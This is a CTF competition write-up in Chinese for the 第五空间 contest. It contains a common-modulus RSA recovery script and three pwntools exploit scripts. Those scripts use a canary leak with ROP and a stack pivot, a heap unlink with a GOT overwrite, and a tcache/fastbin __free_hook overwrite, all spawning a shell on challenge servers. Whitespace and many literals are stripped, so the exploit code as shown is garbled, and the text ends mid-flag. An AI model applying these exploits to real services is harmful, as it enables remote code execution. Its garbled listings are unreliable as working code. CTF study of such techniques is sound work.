第五空间6月24日比赛的部分WP.
目录
crypto
rosb
rsa共模攻击,网上找了个板子改了改
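# Common-modulus RSA attack: the same message m was encrypted twice under one
# modulus n with coprime public exponents e1 and e2.  From e1*s1 + e2*s2 == 1
# the message is recovered as c1^s1 * c2^s2 (mod n).
#
# The writeup's original depended on gmpy2 (gcdext / invert) and on Python 2
# integer division in the decode loop; the same arithmetic is done here with
# the standard library only, so the script runs on Python 3 without extras.


def _egcd(a, b):
    """Return (g, x, y) with a*x + b*y == g == gcd(a, b) (iterative Euclid)."""
    x0, y0, x1, y1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0


def _modinv(a, n):
    """Return the inverse of a modulo n.

    Raises:
        ValueError: if gcd(a, n) != 1, i.e. no inverse exists.
    """
    g, x, _ = _egcd(a % n, n)
    if g != 1:
        raise ValueError("no modular inverse: gcd(a, n) != 1")
    return x % n


def common_modulus_attack(n, e1, c1, e2, c2):
    """Recover m from c1 = m^e1 mod n and c2 = m^e2 mod n.

    Args:
        n: shared RSA modulus.
        e1, e2: the two public exponents; must be coprime.
        c1, c2: the two ciphertexts of the same message.

    Returns:
        The integer message m.

    Raises:
        ValueError: if e1 and e2 are not coprime, or if a ciphertext that
            needs to be inverted has no inverse modulo n.
    """
    g, s1, s2 = _egcd(e1, e2)
    if g != 1:
        raise ValueError("e1 and e2 must be coprime")
    # A negative Bezout coefficient means the matching ciphertext is raised
    # to a negative power, i.e. its modular inverse is used instead.  The
    # original hard-coded the assumption that only s2 is negative.
    if s1 < 0:
        c1, s1 = _modinv(c1, n), -s1
    if s2 < 0:
        c2, s2 = _modinv(c2, n), -s2
    return (pow(c1, s1, n) * pow(c2, s2, n)) % n


def _hex_to_text(m):
    """Decode integer m as big-endian bytes, one chr() per byte.

    Mirrors the original decode loop, with two fixes: the step is an integer
    (the original's ``range(len(s)/2)`` is a TypeError on Python 3) and an
    odd-length hex string is left-padded instead of silently dropping the
    last nibble.
    """
    s = hex(m)[2:].rstrip("L")  # Python 2 appends 'L' to long hex literals
    if len(s) % 2:
        s = "0" + s
    return "".join(chr(int(s[i:i + 2], 16)) for i in range(0, len(s), 2))


if __name__ == "__main__":
    # Challenge parameters exactly as transcribed in the writeup (the
    # transcription may itself be lossy; they are reproduced, not verified).
    n = 0xa1d4df1b8d5bceb49dc8a02f12df9ae80e2a6ee13b7a97d9fe3dd7ac24ab25ab87dde7c6c4cee3fb3ec9b7fdbddde1f0f1a2bba52bad1adb31db9ee1bf9facce8fbfebcff27b7bf7d29cc3fddf7ea31cad59aaecdee7bec4c4dad39dc2b9ceac89fa8e3a4bdb8e7d6da0d9a0d8a3c1acedebe1ccccb0e9dfcddaa18c45a65baba4c5aefa1e67eccd9fcda08dfece8f7fdfff0c4e72a
    e1 = 0xf4cf
    c1 = 0x2fff19fe6ad76efa3cbc07fef5dff8d3ddfcaf9daaa29ce87c1cbbf2dba2eca8b7adba5edac4ffeb3b0c85c3bc0e4aedeaec2fcc5ff99bc3f83ffbaba86cda0f6a9cd4c70be8f36c3ceaae15b5bf0bffbf08ce5aa6c45bdc80c59a9f70a92dc70eebec15d4a5ebfe0d3d14f3ad9ad8eaaf14da59eba2e8ad3adbeede21ac41ab2c7ba3cbd4aa8bad4cc39f02e05ce95a69cc29f6bbc11e4e0cdbd0ecddb38ec8a
    e2 = 0xff7d1
    c2 = 0xd32dfad68ddf2d8bf46bbae5ccf2f3aecbc1cdaea06abaf7d0dbfebdbe58338d1da8a78fe0daee8c1e6addbffc15f1bdcbe4bbe8adb7d15febdf5a87fa4c6c51acaf60aeba3dcdaeddb57da4dc29a2b2ec34c99cdd6bf5d5d01eed47ca7fb8ae7caf2dc20e14c7bd9f7bcd7cda9e3bfb00c2bc9a5abceecc8ffc59ab3bfc19fdaa4fb3ecef3b4cbf4bf76b8ab25bffe53de77eeee6ffbc36f6cc715cddc73dcbcb

    m = common_modulus_attack(n, e1, c1, e2, c2)
    print(hex(m))
    # The original strips the last 64 decoded characters (padding) before printing.
    print(_hex_to_text(m)[:-64])
    # g0od_go0d_stu4y_d4yd4y_Up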
re
nop
main函数里存在三个需要nop的反调试的函数(共五处),nop后的逻辑是:输入数字,然后通过eax一直加(大约是反调试jump的次数)+0xCCCCCCCC,最后的值用于在函数sub_中patcheax和eax+1的值为0x90。因此正确的patch才能跳转到right处,由于中间eax+1有点多不想数b,所以大概算了个值(考虑一下32位溢出),然后前后遍历了一小段数字,得到flag为
rev
本意是一个rop导向的逆向题,但写trace太麻烦了,所以试了下angr的模板,正好可以用,注意一下输入参数为argv1
pwn
twice
第一次溢出一个字节用于泄露canary和栈地址,第二次溢出0x20字节,其中除了填写canary外,rbp位置存放字符串起始栈地址-8,返回地址填leaveret,这样就可以多出88字节的ROP。ROP主体为puts泄露libc地址、read往bss(也可以继续往栈上)写入system(/bin/sh\x00)的另一段ROP,最后栈转移,正好88字节。
# Exploit script from the writeup for the "twice" challenge.
# NOTE(review): extraction removed all whitespace and several literals
# (prompt strings, the remote host/port, most gadget addresses), so this
# listing cannot run as-is.  Lost values are marked below, not guessed.
frompwnimport*
fromLibcSearcherimportLibcSearcher
e=ELF(./pwn)
libc=e.libc
ifargs.I:
context.log_level=debug
ifargs.R:
p=remote(.36.59.,)  # host and port lost in extraction
else:
p=process(e.path)#,env={LD_PRELOAD:LIBC})
# First overflow (one byte, per the writeup): the 89-byte fill makes the
# program echo back the canary and a stack address right after it.
p.sendafter(,A*89)  # prompt literal lost in extraction
p.recvuntil(A*89)
canary=u64(p.recv(7).rjust(8,b\0))  # 7 leaked bytes; the canary's low byte is 0
stack=u64(p.recv(6).ljust(8,b\0))  # 6-byte stack address, zero-extended to 8
print(hex(canary))
print(hex(stack))
p.recvuntil()  # delimiter literal lost in extraction
# Gadget addresses: all but one were truncated to "0x" / a single digit in
# extraction; only pop_rdi_ret keeps a (possibly partial) value.
pop_rdi_ret=0x400
pop_rsi_r15_ret=0x
pop_rsp_13_14_15_ret=0xd
leave_ret=0x
bss=0x
# ROP chain as described in the writeup: puts(got.puts) to leak libc, then
# read(0, bss, ...) to fetch a second chain, then pivot rsp to bss.
payload=p64(pop_rdi_ret)
payload+=p64(e.got[puts])
payload+=p64(e.plt[puts])
payload+=p64(pop_rsi_r15_ret)
payload+=p64(bss)
payload+=p64(0)
payload+=p64(pop_rdi_ret)
payload+=p64(0)
payload+=p64(e.plt[read])
payload+=p64(pop_rsp_13_14_15_ret)
payload+=p64(bss)
print(len(payload))  # the writeup states the chain is exactly 88 bytes
# Second overflow: chain, then the leaked canary, a saved-rbp that points
# back into the chain (stack-0x18-88-8), and leave;ret to pivot into it.
p.send(payload+p64(canary)+p64(stack-0x18-88-8)+p64(leave_ret))
p.recvline()
puts_addr=u64(p.recv(6).ljust(8,b\0))  # leaked puts address (6 bytes)
print(hex(puts_addr))
# libc offsets come from LibcSearcher rather than a local libc file.
libcsearch=LibcSearcher(puts,puts_addr)
libcbase=puts_addr-libcsearch.dump(puts)
system_addr=libcbase+libcsearch.dump(system)
binsh_addr=libcbase+libcsearch.dump(str_bin_sh)
# Second chain, read into bss by the first one: three padding qwords for
# the pop_rsp gadget's r13/r14/r15, then system("/bin/sh").
p.send(p64(0)*3+p64(pop_rdi_ret)+p64(binsh_addr)+p64(system_addr))
#print(p.pid)
p.interactive()
运行实例:
# Tail of the script above, repeated under "运行实例" (run example);
# `p` is the pwntools tube opened there.
print(p.pid)
p.interactive()
pwnme
因为除了off-by-one null byte外更严重的是有任意长度堆溢出的操作,一开始想的是使用overlapping,但因为环境一直搭不起来拿不到unsortedbin的偏移,又看到没开PIE并且GOT表可写,所以最后换了unlink来做。unlink后泄露free地址再填入system地址一把梭。
# Exploit script from the writeup for the "pwnme" challenge (32-bit build
# against a bundled uClibc).
# NOTE(review): whitespace and several literals were lost in extraction;
# lost values are marked in comments rather than reconstructed.
frompwnimport*
fromLibcSearcherimportLibcSearcher
e=ELF(./a.out)
libc=ELF(./lib/libuClibc-1.0.34.so)  # symbol offsets below are read from this file
#libc=e.libc
ifargs.I:
context.log_level=debug
ifargs.R:
p=remote(.36.58.,)  # host and port lost in extraction
else:
p=process(e.path)#,env={LD_PRELOAD:LIBC})
# Menu wrapper: option 1 (show).  The menu prompt literal is lost in extraction.
defShow():
p.sendlineafter(,1)
# Menu wrapper: option 2 (add) with the given length and tag contents.
# The first prompt literal is lost in extraction; "tag" is sent without a
# trailing newline (sendafter), so it may contain raw bytes.
defAdd(lenth,tag):
p.sendlineafter(,2)
p.sendlineafter(Length:,str(lenth))
p.sendafter(Tag:,tag)
# Menu wrapper: option 3 (change) for entry "ind" with a new length and tag.
# The first prompt literal is lost in extraction.
defChange(ind,lenth,tag):
p.sendlineafter(,3)
p.sendlineafter(Index:,str(ind))
p.sendlineafter(Length:,str(lenth))
p.sendafter(Tag:,tag)
# Menu wrapper: option 4 (remove) for entry "ind".  As written it answers a
# "Tag:" prompt with the index; the first prompt literal is lost in extraction.
defRemove(ind):
p.sendlineafter(,4)
p.sendlineafter(Tag:,str(ind))
# Main sequence, following the writeup: unlink on a crafted chunk, leak the
# free address through the GOT, then replace it with system.
chunk=0x  # heap address, truncated in extraction
ptr=chunk+4+8  # location of the chunk pointer targeted by the unlink
Add(0x50,yuri)#0
Add(0x,yuri)#1  # size truncated in extraction
Add(0xf8,yuri)#2
Add(0x50,/bin/sh\x00)#3  # freed last; its data is the system() argument
# Fake-chunk layout for the unlink (fd/bk point at ptr-12 / ptr-8); several
# sizes in this line were truncated in extraction.
Change(1,0x+4,b\0*8+p32(ptr-3*4)+p32(ptr-2*4)+b\0*+p32(0x-2*4))
Remove(2)
# Point entry 1 at the free GOT slot so Show() prints its contents.
Change(1,7,p32(0x50)+p32(e.got[free])[:-1])
Show()
p.recvuntil(:)
base=u32(p.recv(4))-libc.symbols[free]  # libc base from the leaked free address
Change(0,4,p32(base+libc.symbols[system]))  # overwrite free@got with system
Remove(3)  # free(entry 3) now runs system("/bin/sh")
#print(p.pid)
p.interactive()
运行实例:
of
只给源码的pwn,先把tcache填满使得后续堆块释放到fastbin,然后利用scanf触发malloc_consolidate释放到unsortedbin泄露libc地址,最后便是常规改__free_hook的操作。这里比较奇怪的是泄露的unsortedbin的地址多了0x,第一次见这种操作。
# Exploit script from the writeup for the "of" challenge (glibc 2.27).
# NOTE(review): whitespace and some literals were lost in extraction; the
# remote host/port and several sizes are truncated below.
frompwnimport*
fromLibcSearcherimportLibcSearcher
#e=ELF(./pwn)
libc=ELF(./libc-2.27.so)  # provided libc; offsets below are read from it
ifargs.I:
context.log_level=debug
r=remote(.36.74.70,)  # host and port lost in extraction
# Menu wrapper: option 1 (allocate) into slot "ind".
defallocate(ind):
r.sendlineafter(Yourchoice:,1)
r.sendlineafter(Index:,str(ind))
# Menu wrapper: option 4 (delete) for slot "ind".
defdelete(ind):
r.sendlineafter(Yourchoice:,4)
r.sendlineafter(Index:,str(ind))
# Menu wrapper: option 3 (show) for slot "ind"; returns the raw bytes printed
# after "Content:".  The read size is truncated in extraction.
defshow(ind):
r.sendlineafter(Yourchoice:,3)
r.sendlineafter(Index:,str(ind))
r.recvuntil(Content:)
returnr.recv(0x-8)
# Menu wrapper: option 2 (edit) slot "ind" with raw "content" (no newline).
defedit(ind,content):
r.sendlineafter(Yourchoice:,2)
r.sendlineafter(Index:,str(ind))
r.sendafter(Content:,content)
# Main sequence, following the writeup: fill the tcache bin so later frees
# land in fastbin, trigger malloc_consolidate via scanf to get an unsorted
# chunk, leak libc from it, then write system over __free_hook.
foriinrange(7):
allocate(i)
allocate(7)
allocate(8)
foriinrange(7):
delete(i)  # seven frees fill the tcache bin
delete(7)  # this one goes to fastbin
foriinrange(7):
allocate(i)
allocate(9)#7==9  # slot 9 reuses the chunk still referenced by slot 7
foriinrange(7):
delete(i)
delete(7)
# Oversized menu input: the writeup says this scanf call triggers
# malloc_consolidate.  The repeat count is truncated in extraction.
r.sendlineafter(Yourchoice:,7*0x)
# The writeup notes the leaked unsorted-bin address carried an unexpected
# extra offset; its value is truncated in extraction.
base=u64(show(9)[:8])-96-0x10-libc.symbols[__malloc_hook]-0x
free_hook_addr=base+libc.symbols[__free_hook]
system_addr=base+libc.symbols[system]
print(hex(base))
foriinrange(7):
allocate(i)
allocate(7)
delete(7)
edit(9,p64(free_hook_addr-8))  # slot 9 still aliases the freed chunk 7
allocate(10)
allocate(10)  # second allocation returns memory at free_hook_addr-8
edit(10,b/bin/sh\x00+p64(system_addr))  # "/bin/sh" in the chunk, system into __free_hook
delete(10)
r.interactive()
misc
签到
flag{